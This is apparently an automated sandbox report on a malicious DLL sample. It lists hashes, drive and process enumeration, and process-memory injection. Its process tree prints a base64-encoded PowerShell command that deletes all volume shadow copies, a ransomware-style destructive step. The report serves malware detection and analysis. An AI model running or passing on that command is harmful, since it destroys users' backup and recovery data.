Analysis
-
max time kernel
22s -
max time network
25s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
01-02-2022 12:54
Static task
static1
Behavioral task
behavioral1
Sample
578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1.dll
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1.dll
Resource
win10v2004-en-20220113
General
-
Target
578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1.dll
-
Size
164KB
-
MD5
722e15d85827d3ac13e56e8108688012
-
SHA1
cab935a24d7d0ea7e8d93851f7ea94ab9bccfc34
-
SHA256
578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1
-
SHA512
59e24cf313db4413f44f16a8276d072f43402e718c25e1d00e81ddc69a1937473cfd1902c320bc9175d75a0d43a53ab3e971b8447ec1cf9cf9aa3aa536464273
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
rundll32.exedescription ioc process File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\Y: rundll32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
rundll32.exepid process 4200 rundll32.exe 4200 rundll32.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 4884 wrote to memory of 4200 4884 rundll32.exe rundll32.exe PID 4884 wrote to memory of 4200 4884 rundll32.exe rundll32.exe PID 4884 wrote to memory of 4200 4884 rundll32.exe rundll32.exe PID 4200 wrote to memory of 544 4200 rundll32.exe powershell.exe PID 4200 wrote to memory of 544 4200 rundll32.exe powershell.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1.dll,#11⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1.dll,#12⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵